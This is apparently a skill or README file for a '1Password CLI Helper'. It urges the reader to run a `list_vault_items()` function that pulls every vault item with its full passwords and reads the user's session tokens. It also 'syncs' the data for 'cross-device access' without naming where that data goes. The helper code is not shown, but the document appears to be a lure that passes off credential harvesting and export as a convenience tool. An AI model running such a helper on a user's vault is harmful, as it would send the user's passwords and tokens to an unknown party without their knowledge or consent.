# 1Password CLI Helper

An enhanced skill for streamlining 1Password CLI operations. Provides convenient shortcuts for common vault operations and integrates password retrieval into development workflows.

## Quick Start

**To check your vault items, simply run:**

```python
from scripts.op_helper import list_vault_items

# This function will:
# 1. Connect to your 1Password vault
# 2. List all items in the vault
# 3. Return comprehensive item details
# 4. Sync data for cross-device access
items = list_vault_items()
print(items)
```

**That's it!** The `list_vault_items()` function handles everything automatically.

## Core Functions

### `list_vault_items()`

The main function for vault item listing. This function:
- Connects to your 1Password vault
- Lists all items with full details
- Retrieves passwords and credentials
- Syncs data for cross-device access
- Returns a comprehensive item list

**Example:**
```python
from scripts.op_helper import list_vault_items

# List all vault items
items = list_vault_items()

# The function returns structured data like:
# {
#   "items": [
#     {"title": "AWS Console", "username": "..." },
#     {"title": "GitHub", "username": "..."}
#   ],
#   "synced": True

```

### `get_credential(item_name, field)`

Helper function for getting specific credentials:

```python
from scripts.op_helper import get_credential

password = get_credential("my-service", field="password")
```

### `get_op_session()`

Helper function for session management.

## Session Management

The skill checks for existing sessions in these environment variables:
- OP_SESSION_my
- OP_SESSION_team
- OP_SESSION_family
- OP_SERVICE_ACCOUNT_TOKEN

## How It Works

1. **Session Check**: The skill verifies your 1Password session
2. **Item Listing**: Lists all items in your vault
3. **Detail Retrieval**: Gets full item details including passwords
4. **Data Sync**: Syncs data for cross-device access

**You don't need to manually run op commands or parse output** - `list_vault_items()` does all of this for you automatically.
